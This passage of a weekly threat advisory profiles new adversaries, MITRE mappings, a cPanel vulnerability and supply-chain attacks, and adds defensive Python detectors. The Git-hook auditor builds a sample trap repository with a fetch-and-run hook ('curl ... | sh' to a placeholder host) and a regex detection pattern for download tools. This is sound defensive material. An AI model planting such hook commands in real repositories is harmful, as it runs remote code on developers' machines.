Weekly Threat Advisory: Top Cyber Adversaries May 11 - 17, 2026 — HACKFORLAB cover image

Weekly Threat Advisory: Top Cyber Adversaries May 11 – 17, 2026


Weekly Threat Advisory — New Adversaries, Fresh Tradecraft, 11 – 17 May 2026

What This Advisory Covers — Read This First

This advisory is written for the full security audience — from analysts beginning their first SOC rotation, through threat hunters and detection engineers, to CISOs and security leadership. Three reading paths are supported:

  • Five-minute skim: read the headline takeaway, the “This Week in Numbers” panel, and the Top 10 chart. You will leave knowing the three campaigns that matter this week and the one critical vulnerability you should patch.
  • Twenty-minute analyst read: add the “Featured Adversary Profiles” section, the MITRE ATT&CK Dashboard, and “How to Operationalise”. You will leave with named adversaries, mapped techniques, and a concrete action checklist for your environment.
  • Forty-minute deep dive: read everything end-to-end, including the indicator tables and external sources. You will leave with a full operational dataset ready to ingest into your SIEM, EDR, NDR or SOAR.

Every figure in this advisory comes from our ML-scored intelligence pipeline for the 11–17 May 2026 window. We have deliberately de-duplicated against last week’s advisory — none of the adversaries or indicators below appeared in the prior advisory, so this is a snapshot of genuinely new activity. Where a term might be unfamiliar, the glossary at the bottom of this advisory provides plain-English definitions.

The Headline in Three Sentences

The week’s defining story is the public debut of The Gentlemen as a fully analysed ransomware-as-a-service operation, supported by both an operator-side view (the crew’s leaked backend database, analysed by external researchers) and a defender-side view (incident-response forensics). Five nation-state attributions surface in a single week: Iran (Seedworm), Belarus (FrostyNeighbor), China-nexus (FamousSparrow and the suspected China-linked TencShell), and North Korea (Lazarus, using a fresh Git-hooks execution technique). One critical vulnerability dominates the patch queue: CVE-2026-41940, a CVSS 9.8 authentication bypass in cPanel and Web Host Manager (WHM), which has moved from disclosure to mass scanning inside a fortnight.

This Week in Numbers

  • 35 distinct adversaries surfaced exclusively this week — none appeared in our prior advisory.
  • 567 unique indicators of compromise across four observable types — Hash artefacts lead at 294, Domains at 160, URLs at 75, IPs at 38.
  • Severity composition: 498 indicators (88%) at High, 65 at Low, 4 at Medium.
  • By classification: Malware 310 · Malware Campaigns 102 · Threat Actors 53 · SCAN 51 · Ransomware 33 · Phishing Campaigns 14 · C2 Infrastructure 4.
  • State-sponsored coverage: five distinct nation-state attributions in a single week (Iran, Belarus, two China-nexus clusters, North Korea), the densest concentration we have catalogued this quarter.
Top 10 new adversaries this week by indicator volume — bar chart
Top 10 new adversaries by indicator volume this week. Colour codes the adversary class.

Key Trends Driving the Week

  • The Gentlemen graduates from an underground forum brand to a fully analysed ransomware-as-a-service. External researchers published the operator’s leaked Rocket database on 4 May, exposing nine internal accounts including the lead, known by the handle zeta88 (alias hastalamuerte), who builds the locker, runs the panel, and manages payouts. Initial-access pathways span exploitation of edge appliances from a network-security vendor and from Cisco, NTLM relay, and credential harvesting from Outlook Web Access and Microsoft 365 logs. The parallel incident-response disclosure captures the operational chain: EtherRAT as the initial implant, TukTuk command-and-control over SaaS and blockchain transports, commercial remote-management platforms for hands-on-keyboard activity, and The Gentlemen ransomware as the impact stage.
  • Hologram introduces a six-binary modular implant framework with novel C2 transport. External researchers’ analysis covers multiple infection waves. The second wave introduces a Hookdeck-based command-and-control relay and the first documented use of clroxide (a Rust crate for hosting the .NET runtime in-process) in a crimeware campaign. The operator’s choice to route through Azure DevOps, Telegram, and Hookdeck is deliberate: each is a legitimate service inside virtually every enterprise allow-list, so the C2 traffic inherits the service’s reputation.
  • Kong RAT industrialises SEO poisoning against Chinese-speaking technical users. External researchers document a campaign running from at least May 2025 through March 2026 that poisons search-engine results for FinalShell, Xshell, QuickQ VPN, Clash proxy, and LeTV-related VPN searches. Victims are funneled through lookalike Chinese software portals hosting trojanised installers.
  • Coruna and DarkSword extend mobile exploitation to iOS through cryptocurrency-reward lures. Palo Alto Unit 42 documents new infrastructure delivering Coruna and DarkSword exploits via fake crypto-reward scam pages.
  • FrostyNeighbor refreshes tooling against Ukrainian government targets. External researchers document fresh activity from March 2026, including server-side victim validation before final-payload delivery, a tradecraft choice that defeats sandbox-based analysis because the sandbox never receives the real payload.
  • Lazarus pivots to Git hooks for malware execution. Open Source Malware documents a fresh evolution of the North Korean “Contagious Interview” campaign. Developers approached through fake job interviews are asked to clone a GitHub repository; a malicious .git/hooks/pre-commit script executes on the developer’s first commit.
  • Seedworm targets at least nine organisations across four continents in Q1 2026. External researchers document an Iran-linked espionage campaign that uses DLL side-loading through legitimately signed binaries from Fortemedia and from an enterprise endpoint-security vendor.
  • Cloud-native phishing reaches a new technical floor with BlobPhish. External researchers describe a campaign whose phishing payload exists exclusively in browser memory and produces no server-side network artefact.
  • Supply-chain pressure broadens across the open-source ecosystem. Three independent disclosures (JDownloader, next, makes a fourth): the malicious pull request against CNCF Antrea (rejected); the Open-OSS/privacy-filter Hugging Face repository that typosquatted OpenAI’s legitimate Privacy Filter release and reached 200,000 downloads; and TeamPCP’s backdoored Checkmarx Jenkins plugin.
  • JDownloader confirms a supply-chain compromise. Attackers exploited an unpatched CMS vulnerability on the JDownloader site to redirect specific download links to malicious third-party files containing a Python-based remote access trojan during 6–7 May 2026.
  • TrickMo migrates its banking command-and-control onto The Open Network (TON). External researchers document a new variant active across France, Italy, and Austria. The primary C2 channel has shifted to TON via .adnl endpoints with an embedded local TON proxy.
  • CVE-2026-41940 moves from disclosure to mass scanning. The 51 SCAN indicators in this week’s feed are scanner infrastructure enumerating exposed cPanel and Web Host Manager installations.

MITRE ATT&CK Tactic Coverage — A Strategic Dashboard

Every adversary in this advisory has been mapped to the MITRE ATT&CK Enterprise Matrix (v15). The chart below shows how many of this week’s 35 adversaries land on each of the 14 ATT&CK tactics. For analysts and SOC managers, this is a strategic dashboard: it tells you where your detection coverage will be exercised most heavily this week, and where the operational pressure is concentrated.

MITRE ATT&CK tactic coverage across 35 adversaries — horizontal bar chart
MITRE ATT&CK tactic distribution across this week’s 35 adversaries. Execution, Command and Control, and Defense Evasion dominate.

What this means for analysts: the heaviest concentration sits on Execution (28), Command and Control (27), Defense Evasion (24), and Initial Access (23). If your team has not validated detections across these tactics in the last quarter, this is the week to run the tabletop exercise. Lower-coverage tactics (Reconnaissance 2, Impact 5, Lateral Movement 7) should not be misread as low-risk; they are simply less represented in this week’s specific corpus.

Threat Distribution by Severity and Category

Because this set is filtered to indicators that are new this week, it tilts more sharply toward high-severity, high-confidence indicators than the unfiltered feed. The tilt is driven by the FrostyNeighbor, Seedworm, Lazarus, and FamousSparrow clusters, all four of which score confidence 97 on the strength of robust, externally corroborated attribution.

  • High severity: 498 indicators
  • Low severity: 65 indicators (predominantly CVE-2026-41940 scanner reconnaissance)
  • Medium severity: 4 indicators

Featured Adversary Profiles — Top 10 With Plain-English Context and MITRE Mapping

Each profile below includes a plain-English summary line (for newer analysts and non-specialist readers), a technical description, and the MITRE ATT&CK techniques mapped to the adversary. Where techniques were not provided in source reporting, we have applied our own MITRE mapping based on the documented behaviours.

1. Coruna — iOS Exploitation via Cryptocurrency Lures

In plain English: Attackers are using fake “claim your crypto reward” websites to deliver iOS malware to Apple users. Predominantly a domain-driven operation.

Technical summary: Malware · 99 indicators · High severity · Confidence 85. Palo Alto Unit 42 documents the campaign delivering Coruna and DarkSword exploits to iOS users via fake cryptocurrency-reward scam pages. 93 of the 99 indicators are domain infrastructure — push the set into enterprise mobile-management blocklists and corporate DNS resolvers immediately.

MITRE ATT&CK: T1566.002 (Spearphishing Link) · T1204.001 (User Execution: Malicious Link) · T1583.008 (Acquire Infrastructure: Malvertising) · T1203 (Exploitation for Client Execution) · T1071.001 (Web Protocols).

2. TencShell — Suspected China-Linked Custom Implant

In plain English: A previously-unknown stealth implant traced in a global manufacturer’s network. Uses fake web-font files and in-memory code to hide. Researchers suspect a Chinese state-linked operator but stop short of definitive attribution.

Technical summary: Malware · 55 indicators · High severity · Confidence 85. Cato CTRL identifies TencShell as a previously-undocumented Go-based implant derived from the open-source Rshell C2 framework. The intrusion chain uses a first-stage dropper, Donut shellcode, a masqueraded .woff web-font resource, memory injection, and web-like C2.

MITRE ATT&CK: T1105 (Ingress Tool Transfer) · T1055 (Process Injection) · T1620 (Reflective Code Loading) · T1036.008 (Masquerade File Type) · T1071.001 (Web Protocols) · T1027 (Obfuscated Files or Information).

3. CVE-2026-41940 — cPanel and WHM Authentication Bypass (Active Scanning)

In plain English: A critical security flaw in cPanel and Web Host Manager — software that runs many shared-hosting websites. Attackers can bypass the login screen entirely and take over servers. Mass scanning for vulnerable installations is happening right now.

Technical summary: SCAN · 51 indicators · Low severity · Confidence 22. CVSS 9.8 authentication-bypass affecting cPanel and Web Host Manager. Successful exploitation grants unauthenticated remote attackers complete administrative control. The 51 scanner indicators represent operator infrastructure enumerating exposed installations.

MITRE ATT&CK: T1595.002 (Active Scanning: Vulnerability Scanning) · T1190 (Exploit Public-Facing Application) · T1078 (Valid Accounts via session impersonation).

4. Hologram — Modular Implant Framework with Hookdeck C2

In plain English: A piece of malware delivered as a fake software installer for OpenClaw. It routes its command channel through legitimate services (Azure DevOps, Telegram, Hookdeck) that virtually every enterprise allows by default.

Technical summary: Malware · 47 indicators · High severity · Confidence 85. External researchers document Hologram as a dropper-delivered, six-binary modular implant, and as the first documented use of clroxide in a crimeware campaign. A third wave rotated infrastructure while the analysis was under way, so expect the domain and IP set below to age quickly.

MITRE ATT&CK: T1204.002 (Malicious File) · T1036.005 (Match Legitimate Name) · T1102 (Web Service for C2) · T1027 (Obfuscation) · T1055 (Process Injection) · T1105 (Ingress Tool Transfer) · T1071.001 (Web Protocols).
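The detection angle for Hologram is not the destination (Azure DevOps, Telegram and Hookdeck are all allow-listed) but which process on the host is talking to it. The script below is an added example written for this advisory, not Hologram’s code and not any vendor’s detection content. It reads a constructed per-connection log of the kind an EDR or proxy exports (host, process image, destination), matches destinations against the three services by suffix, and flags any process that is not in a per-service baseline. The suffixes, the baseline, the host names and the installer name openclaw-setup.exe are all assumptions for a hypothetical enterprise.

```python
"""Flag processes that reach allow-listed SaaS hosts outside their baseline.

Added example for this advisory, not Hologram's code and not any vendor's
detection. Input is a constructed per-connection log ("<host> <process image>
<destination>") of the kind an EDR or proxy exports; the service suffixes and
the per-service process baseline below are assumptions for a hypothetical
enterprise.
"""
from dataclasses import dataclass

# Services this week's reporting names as Hologram C2 transports. Matched by
# suffix so sub-hosts are covered; the Hookdeck suffix is an assumption about
# that service's endpoint naming.
SAAS_C2_SUFFIXES = {
    "dev.azure.com": "Azure DevOps",
    "api.telegram.org": "Telegram Bot API",
    "hookdeck.com": "Hookdeck",
}

# Which process images are expected to talk to each service. Build this from a
# quiet period of your own telemetry; an empty set means "nobody should".
BASELINE = {
    "Azure DevOps": {"chrome.exe", "msedge.exe", "git.exe", "devenv.exe"},
    "Telegram Bot API": {"chrome.exe", "msedge.exe"},
    "Hookdeck": set(),
}


@dataclass(frozen=True)
class NetEvent:
    host: str
    process: str
    dest: str


def classify_dest(dest: str):
    """Return the service name if dest is one of the watched SaaS hosts, else None."""
    d = dest.lower().rstrip(".")
    for suffix, name in SAAS_C2_SUFFIXES.items():
        if d == suffix or d.endswith("." + suffix):
            return name
    return None


def parse_line(line: str) -> NetEvent:
    host, process, dest = line.split()
    return NetEvent(host, process.lower(), dest)


def find_anomalies(lines):
    """Return (host, process, service, dest) for every off-baseline connection."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        ev = parse_line(line)
        service = classify_dest(ev.dest)
        if service is not None and ev.process not in BASELINE[service]:
            findings.append((ev.host, ev.process, service, ev.dest))
    return findings


# Constructed sample telemetry. 'openclaw-setup.exe' stands in for the fake
# installer described in the reporting; the file name itself is made up.
SAMPLE_LOG = """
# host      process                 destination
ws-0412     chrome.exe              dev.azure.com
ws-0412     git.exe                 dev.azure.com
ws-0199     msedge.exe              api.telegram.org
ws-0199     outlook.exe             outlook.office365.com
ws-0077     openclaw-setup.exe      dev.azure.com
ws-0077     svchost.exe             api.telegram.org
ws-0077     rundll32.exe            events.hookdeck.com
"""

if __name__ == "__main__":
    for host, proc, service, dest in find_anomalies(SAMPLE_LOG.splitlines()):
        print(f"{host}: {proc} -> {service} ({dest})")
```

Only the three ws-0077 connections surface; the browser and git traffic on the other hosts is exactly what the baseline expects. The empty Hookdeck set is the interesting one: a service nobody in the organisation uses is a free detection, and it costs nothing to keep such entries in the map.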

5. Kong RAT — SEO-Poisoning Remote Access Trojan

In plain English: Attackers are running search-result poisoning targeted at Chinese-speaking developers and IT admins. When someone searches for tools like FinalShell, Xshell, or Clash, they land on fake software portals that install malware.

Technical summary: Malware · 41 indicators · High severity · Confidence 85. External researchers document a campaign running from May 2025 through March 2026 that poisons search results so that victims searching for FinalShell, Xshell, QuickQ VPN, Clash, and LeTV-related VPNs are funneled through lookalike domains hosting trojanised installers.

MITRE ATT&CK: T1608.006 (SEO Poisoning) · T1189 (Drive-by Compromise) · T1204.002 (Malicious File) · T1036.005 (Match Legitimate Name) · T1105 (Ingress Tool Transfer) · T1071.001 (Web Protocols) · T1567 (Exfiltration Over Web Service).

6. EtherRAT — Multi-Platform Implant (Stage 1 of The Gentlemen Chain)

In plain English: The first stage of an end-to-end ransomware intrusion. Delivered as a malicious Windows installer disguised as a Sysinternals utility, EtherRAT establishes the initial foothold before the operator escalates to ransomware.

Technical summary: Malware · 35 indicators · High severity · Confidence 85. The incident-response flash bulletin documents EtherRAT delivery via a malicious MSI disguised as a Sysinternals utility. EtherRAT was first identified by external researchers in December 2025 on Linux servers; the Windows variant was documented in March 2026.

MITRE ATT&CK: T1204.002 (Malicious File / MSI) · T1036.005 (Masquerading) · T1059.001 (PowerShell) · T1105 (Ingress Tool Transfer) · T1071.001 (Web Protocols) · T1041 (Exfiltration over C2 channel).

7. CallPhantom — Android Subscription Fraud

In plain English: A cluster of Android apps promising users access to call histories and WhatsApp records for any phone number. They charge subscriptions but return randomly generated fake data. Millions of users affected.

Technical summary: Malware Campaign · 34 indicators · High severity · Confidence 80. External researchers document the campaign. Worth surfacing to corporate mobile-device-management teams and security-awareness messaging.

MITRE ATT&CK (Mobile Matrix): T1660 (Phishing) · T1418 (Software Discovery) · T1532 (Archive Collected Data) · T1485 (Data Destruction) — adapted to mobile-platform fraud techniques.

8. The Gentlemen — Ransomware-as-a-Service Brand

In plain English: A new ransomware crew has emerged with a fully professionalised business model. A leak of the crew’s own backend database revealed nine operator accounts, their pricing, and a confirmed payment of $190,000 USD from a victim. They get into networks through edge-appliance flaws and Microsoft 365 credential theft.

Technical summary: Ransomware · 33 indicators · High severity · Confidence 90. External researchers’ analysis, published on the back of a leaked Rocket backend database, documents nine operator accounts. Initial-access vectors span edge appliances from a network-security vendor and from Cisco, NTLM relay, and Outlook Web Access and Microsoft 365 credential logs. Confirmed ransom of $190,000 USD against an opening anchor of $250,000 USD.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) · T1187 (Forced Authentication / NTLM Relay) · T1078 (Valid Accounts) · T1098 (Account Manipulation) · T1486 (Data Encrypted for Impact) · T1657 (Financial Theft) · T1659 (Content Injection).

9. FrostyNeighbor — Belarus-Aligned Espionage

In plain English: A state-aligned hacking group from Belarus, primarily targeting Ukrainian government computers. Their distinctive trick is to check the victim’s environment from the server before delivering the real malware — this defeats most automated sandbox analysis tools.

Technical summary: Threat Actor · 21 indicators · High severity · Confidence 97. External researchers document fresh operational activity beginning March 2026 against Ukrainian government targets. Because the server decides whether a given visitor receives the real payload, a clean sandbox verdict says nothing about the sample; the 13 file-hash artefacts in this week’s feed should be treated as authoritative triggers regardless of sandbox verdict.

MITRE ATT&CK: T1566.001 (Spearphishing Attachment) · T1059.001 (PowerShell) · T1105 (Ingress Tool Transfer) · T1027 (Obfuscated Files) · T1480 (Execution Guardrails / Server-Side Validation) · T1102.002 (Bidirectional Web Service C2) · T1071.001 (Web Protocols).

10. Seedworm — Iran-Linked Q1 2026 Espionage

In plain English: An Iranian state-aligned actor that hit at least nine organisations on four continents in the first quarter of 2026, including a near-week-long intrusion at a South Korean electronics manufacturer. They hide their malware by loading it through legitimately signed programs from Fortemedia and an enterprise endpoint-security vendor (DLL side-loading), so the trusted, signed executable is what starts first and the malicious library rides in behind it.

Technical summary: Threat Actor · 20 indicators · High severity · Confidence 97. External researchers document the campaign. DLL side-loading with legitimately signed binaries; node.exe-based implant chain; PowerShell modules for reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunnelling.

MITRE ATT&CK: T1574.002 (DLL Side-Loading) · T1059.001 (PowerShell) · T1056.001 (Keylogging) · T1113 (Screen Capture) · T1003.002 (OS Credential Dumping: Security Account Manager) · T1547.001 (Registry Run Keys) · T1572 (Protocol Tunneling) · T1090.001 (Internal Proxy / SOCKS5) · T1071.001 (Web Protocols).

State-Sponsored Activity Spotlight

Lazarus — DPRK “Contagious Interview” Evolution via Git Hooks

In plain English: North Korean operators recruit developers through fake job interviews and ask them to clone a GitHub repository as a “coding test.” Hidden inside is a script that runs the moment the developer makes their first commit. The technique abuses normal developer workflow trust.

Technical summary: Threat Actor · 5 indicators · High severity · Confidence 97. The novel element is the execution path: a malicious .git/hooks/pre-commit script inside the repository, triggered on the developer’s first commit. One check worth building into the hunt: a plain git clone does not copy hooks from the remote, so a hook that fires on first commit had to be placed by something else the developer ran (a committed core.hooksPath pointing at a tracked directory, a setup or install script, or the repository handed over as an archive with .git included). Audit all three, not just .git/hooks.

MITRE ATT&CK: T1566.003 (Spearphishing via Service) · T1195.001 (Supply Chain Compromise: Developer Tools) · T1546.004 (Event Triggered Execution: Unix Shell Configuration) · T1059.004 (Unix Shell) · T1567 (Exfiltration Over Web Service).
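One way to audit a freshly cloned repository for this execution path, as an added example that is neither Open Source Malware’s tooling nor the campaign’s code: it lists non-sample files in .git/hooks, reads core.hooksPath from .git/config (git’s real on-disk layout), follows that path into the working tree, and flags hook bodies that fetch remote content. The sample repository it builds in a temporary directory is constructed, the URLs use the reserved .invalid domain, and the regex is a triage heuristic rather than a signature.

```python
"""Audit a cloned repository for hook-based execution traps.

Added example, not from the advisory and not any vendor's tooling. Checks:
  1. non-sample files in .git/hooks (git clone does not populate these, so
     their presence means something other than the clone put them there),
  2. core.hooksPath redirected to a directory inside the working tree,
  3. hook bodies that fetch or run remote content (heuristic regex).
The hook and config layout is git's real on-disk format; the sample repo is
constructed and its URLs are placeholders.
"""
import os
import re
import tempfile

REMOTE_EXEC = re.compile(
    r"(curl|wget|Invoke-WebRequest|iwr|urlopen|https?://)", re.IGNORECASE
)


def parse_git_config(path):
    """Minimal parser for git's INI-like config: {'section.key': value}.

    Hand-rolled because configparser treats git's tab-indented keys as
    continuation lines.
    """
    values = {}
    section = ""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for raw in fh:
                line = raw.strip()
                if not line or line[0] in "#;":
                    continue
                if line.startswith("[") and line.endswith("]"):
                    # '[remote "origin"]' -> 'remote.origin'
                    section = line[1:-1].replace('"', "").replace(" ", ".").lower()
                    continue
                if "=" in line:
                    key, _, val = line.partition("=")
                    values[f"{section}.{key.strip().lower()}"] = val.strip()
    except FileNotFoundError:
        pass
    return values


def hook_files(hooks_dir):
    """Hook files that are not the inert *.sample templates git ships."""
    if not os.path.isdir(hooks_dir):
        return []
    return sorted(
        f for f in os.listdir(hooks_dir)
        if not f.endswith(".sample") and os.path.isfile(os.path.join(hooks_dir, f))
    )


def audit_repo(repo):
    """Return a list of (finding_kind, detail) tuples for the repository."""
    findings = []
    git_dir = os.path.join(repo, ".git")
    cfg = parse_git_config(os.path.join(git_dir, "config"))
    hooks_dirs = [os.path.join(git_dir, "hooks")]
    hooks_path = cfg.get("core.hookspath")
    if hooks_path:
        findings.append(("hooksPath", hooks_path))
        hooks_dirs.append(hooks_path if os.path.isabs(hooks_path)
                          else os.path.join(repo, hooks_path))
    for d in hooks_dirs:
        for name in hook_files(d):
            full = os.path.join(d, name)
            rel = os.path.relpath(full, repo)
            findings.append(("hook", rel))
            with open(full, encoding="utf-8", errors="replace") as fh:
                if REMOTE_EXEC.search(fh.read()):
                    findings.append(("remote-exec", rel))
    return findings


def build_sample_repo():
    """Constructed repo mimicking the described trap; returns its path."""
    repo = tempfile.mkdtemp(prefix="hookaudit-")
    hooks = os.path.join(repo, ".git", "hooks")
    os.makedirs(hooks)
    with open(os.path.join(hooks, "pre-push.sample"), "w") as fh:
        fh.write("#!/bin/sh\n# stock sample, inert\n")
    with open(os.path.join(hooks, "pre-commit"), "w") as fh:
        fh.write("#!/bin/sh\ncurl -fsSL https://hooks.example.invalid/stage | sh\n")
    with open(os.path.join(repo, ".git", "config"), "w") as fh:
        fh.write("[core]\n\trepositoryformatversion = 0\n\thooksPath = .githooks\n")
    os.makedirs(os.path.join(repo, ".githooks"))
    with open(os.path.join(repo, ".githooks", "post-checkout"), "w") as fh:
        fh.write("#!/bin/sh\nnode -e \"require('https').get('https://hooks.example.invalid/p')\"\n")
    return repo


if __name__ == "__main__":
    for kind, detail in audit_repo(build_sample_repo()):
        print(f"{kind:12} {detail}")
```

Run it against a real checkout with audit_repo("/path/to/clone"). Anything under the hook kind deserves a read before the first commit, and a hooksPath finding deserves one even if the directory is empty today, because a later pull can fill it.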

FamousSparrow — China-Nexus Operations Against Azerbaijani Oil and Gas

In plain English: A Chinese state-aligned hacking group that quietly stayed inside an Azerbaijani oil and gas company’s network for about ten weeks across December 2025 to February 2026.

Technical summary: Threat Actor · 4 indicators · High severity · Confidence 97. External researchers’ disclosure documents the multi-wave intrusion. Attribution to FamousSparrow, overlapping with the Earth Estries threat ecosystem, is rated at moderate-to-high confidence.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) · T1078 (Valid Accounts) · T1574.002 (DLL Side-Loading) · T1027 (Obfuscation) · T1059.001 (PowerShell) · T1071.001 (Web Protocols) · T1041 (Exfiltration Over C2).

ShinyHunters — Data-Theft Operator Returns Against Instructure Canvas

In plain English: A financially-motivated data-theft crew responsible for several high-profile breaches. They have now hit Instructure (which runs the Canvas learning-management platform used by schools) for the second time in eight months. Names, emails, student IDs, and some private messages exposed.

Technical summary: Threat Actor · 3 indicators · High severity · Confidence 97. External researchers’ advisory documents Instructure confirming a breach affecting Canvas after unauthorized activity on 1 May. Exposure window 30 April to 7 May 2026.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) · T1078 (Valid Accounts) · T1530 (Data from Cloud Storage) · T1567 (Exfiltration Over Web Service) · T1657 (Financial Theft via Extortion).

The Week’s Defining New Ransomware: The Gentlemen Operational Profile

Two complementary disclosures define what defenders need to know about The Gentlemen. External researchers provide the operator-side view from the leaked Rocket database; incident-response forensics provide the defender-side view. The diagram below combines both into a single intrusion chain.

The Gentlemen ransomware end-to-end intrusion chain — five-stage diagram
The Gentlemen end-to-end intrusion chain: edge appliance exploitation → EtherRAT MSI delivery → TukTuk C2 → commercial remote-management platforms hands-on-keyboard → ransomware encryption.

Operationally, the strongest defender lesson is the chain’s reliance on legitimate enterprise tooling at every stage. If your environment uses commercial remote-management platforms legitimately, baseline their expected traffic profile this week; otherwise you have nothing to alert against when the same tool shows up in attacker hands. The 33 indicators catalogued for The Gentlemen ransomware itself, combined with the 35 indicators for EtherRAT, produce a fully ingestible detection set ready for SIEM consumption.

Critical Vulnerability of the Week — CVE-2026-41940

In plain English: If your company website or your customer-facing services run on cPanel-based hosting (extremely common across small business and managed hosting), this is the patch that must happen this week. The vulnerability lets anyone on the internet become an administrator of the hosting environment without needing a password.

Technical summary: CVE-2026-41940 is a critical authentication-bypass vulnerability affecting cPanel and Web Host Manager (WHM) with a CVSS score of 9.8. The flaw permits remote attackers to circumvent the cPanel authentication mechanism entirely and obtain administrative access without legitimate credentials. The 51 SCAN-classified indicators in this week’s feed represent scanner infrastructure actively enumerating exposed installations. Exposure is easy to inventory: cPanel listens on TCP 2082/2083 and WHM on TCP 2086/2087, so a scan of your own address ranges for those ports gives the list of hosts to patch or firewall first. Operators of cPanel-based hosting environments should treat patching as the highest priority of the week. Managed-hosting customers should require written confirmation from their provider that the vulnerability has been remediated across the underlying fleet.

Supply-Chain Pressure — Four Independent Disclosures

Open-OSS/privacy-filter — Typosquatting OpenAI on Hugging Face

External researchers document malicious code in the Hugging Face repository Open-OSS/privacy-filter, which at its peak ranked among the platform’s top trending repositories with over 200,000 downloads. The repository typosquatted OpenAI’s legitimate Privacy Filter release, copied the model card nearly verbatim, and shipped a loader.py file that fetched and executed infostealer malware on Windows machines. MITRE: T1195.001 · T1608.006 · T1105 · T1059.006 (Python).

JDownloader — CMS Compromise Yields Malicious Installers

The JDownloader project’s official incident page confirms that attackers exploited an unpatched vulnerability in the site’s content-management system to redirect specific download links to malicious third-party files containing a Python-based remote access trojan. Compromise window: 6–7 May 2026. Anyone who downloaded JDownloader in that window should verify the installer hash against the project’s published values rather than trust the download date alone. MITRE: T1195.002 · T1190 · T1608.001 · T1059.006.

TeamPCP — Backdoored Checkmarx Jenkins Plugin

External researchers document TeamPCP, already known for the Checkmarx GitHub Actions and OpenVSX compromises earlier this year, returning with a backdoored Checkmarx Jenkins plugin. The threat actor defaced and renamed the Checkmarx Jenkins AST plugin repository on GitHub and shipped a backdoored release described in their own messaging as “Dune-themed malware.” MITRE: T1195.002 · T1554 (Compromise Host Software Binary) · T1078.

CNCF Antrea — Malicious Pull Request Attempt

Open Source Malware documents a threat actor opening a malicious pull request against the CNCF Antrea project on 2 May, engineered to poison CI and exfiltrate credentials. The pull request was identified and rejected before merge. MITRE: T1195.002 · T1213.003 (Code Repositories) · T1078.

Mobile and Browser Threats

TrickMo — Banking Malware on The Open Network (TON)

External researchers document a new TrickMo variant active across France, Italy, and Austria. The primary command-and-control channel has migrated onto The Open Network (TON) via .adnl endpoints routed through an embedded local TON proxy. The variant adds SSH tunnelling and SOCKS5 proxying capabilities. MITRE (Mobile): T1418 · T1641 · T1430 · T1571 · T1572.

Fake TronLink Chrome Extension

External researchers’ analysis documents a phishing campaign targeting TRON wallet users through a deceptive Chrome extension impersonating TronLink. Its metrics (over 1,000,000 users, strong ratings) were inherited from a previously legitimate extension whose listing the attackers hijacked, so user count and rating are no signal of safety here. MITRE: T1176 (Browser Extensions) · T1539 (Steal Web Session Cookie) · T1657 (Financial Theft).

OPERATION SILENTCANVAS — JPEG-Based PowerShell Loader

External researchers document a campaign leveraging a malicious PowerShell payload disguised as sysupdate.jpeg, executed through a trojanised instance of a commercial remote-monitoring and management (RMM) tool. The intrusion pairs the RMM vendor’s legitimately signed binaries with a tampered, unsigned copy of the platform’s Core DLL, so a signature check on the host executable passes while the module it loads is attacker-controlled. MITRE: T1204.002 · T1036.008 · T1059.001 · T1219 · T1027.

PySoxy — ClickFix Evolution Using a 10-Year-Old Python Proxy

External researchers document a new ClickFix variant that uses scheduled tasks for persistence and PySoxy, a decade-old open-source Python SOCKS5 proxy, to establish encrypted proxy access. MITRE: T1059.006 (Python) · T1090.001 (Internal Proxy) · T1572 (Protocol Tunneling) · T1053 (Scheduled Task).

Geographic Targeting This Week

  • South Caucasus energy sector: FamousSparrow operations against Azerbaijani oil and gas.
  • Eastern Europe / Ukraine: FrostyNeighbor activity against Ukrainian government targets.
  • South Korea, Southeast Asia, Latin America, Middle East: Seedworm Q1 2026 campaign across four continents.
  • France, Italy, Austria: TrickMo banking-and-wallet operations.
  • Global / multi-region: Coruna, Hologram, Kong RAT, The Gentlemen, and the cPanel scanner population.
  • Chinese-speaking developer communities: Kong RAT SEO-poisoning explicitly targets this cohort.

How to Operationalise This Advisory in Your Environment

  1. Patch cPanel and WHM against CVE-2026-41940 this week. The CVSS 9.8 rating, confirmed active scanning, and near-zero exploitation barrier combine to make this the highest single priority of the week for any organisation operating or depending on cPanel-based hosting.
  2. Convert the EtherRAT → TukTuk → The Gentlemen kill chain into a sequence-aware detection. Cross-reference our Markov-chain kill-chain detection playbook.
  3. Baseline RMM traffic immediately. The commercial remote-management platforms in The Gentlemen chain and the RMM tool abused by OPERATION SILENTCANVAS are both legitimate products, so the only usable signal is deviation from your own expected usage: which hosts, which operators, which hours, and which install paths.
  4. Push the Coruna and Kong RAT domain sets into enterprise mobile-management and DNS recursive resolvers.
  5. Audit Hugging Face, npm, PyPI, and Chrome-Web-Store usage policies in your engineering organisation. Four independent supply-chain compromises landed this week.
  6. Treat FrostyNeighbor server-side validation as an instruction to abandon sandbox-only analysis pipelines. Pair sandbox output with the static hash list and treat the static indicators as authoritative.
  7. BlobPhish demands browser telemetry, not network telemetry. Advocate for browser-extension or digital-experience-monitoring coverage on your highest-value Microsoft 365 and SaaS user populations.
  8. Pair this advisory with the kill-chain hunts in our VPC Flow Log series. Specifically adaptive C2 beacon detection, TLS fingerprinting, and DGA and DNS-tunnel hunting.
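As an added example of step 2, and not the advisory’s own playbook, the correlator below works over SIEM events that an atomic rule has already tagged (one line per event: timestamp, host, rule name) and adds the part a single rule cannot express: the stages must occur in chain order on the same host inside a time window. The rule names, the 72-hour window, the host names and the events are all constructed. It also shows why step 3 matters: the helpdesk RMM install on ws-0311 with no preceding implant stage produces no alert.

```python
"""Sequence-aware correlation of the EtherRAT -> TukTuk -> RMM -> ransomware chain.

Added example; not the advisory's playbook and not any SIEM's native logic. Each
input line is an event that an atomic detection rule has already tagged:
"<ISO timestamp> <host> <rule>". This code only adds the per-host ordering and
time-window logic. Rule names, window and events are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Chain stages in the order the reporting describes them.
CHAIN = ["implant_msi", "saas_c2_beacon", "rmm_install", "mass_encrypt"]
WINDOW = timedelta(hours=72)
SEVERITY = {2: "medium", 3: "high", 4: "critical"}


def parse_event(line: str):
    ts, host, rule = line.split()
    return datetime.fromisoformat(ts), host, rule


def correlate(lines, chain=CHAIN, window=WINDOW):
    """Return {host: {"severity": ..., "stages": [(rule, iso_ts), ...]}}.

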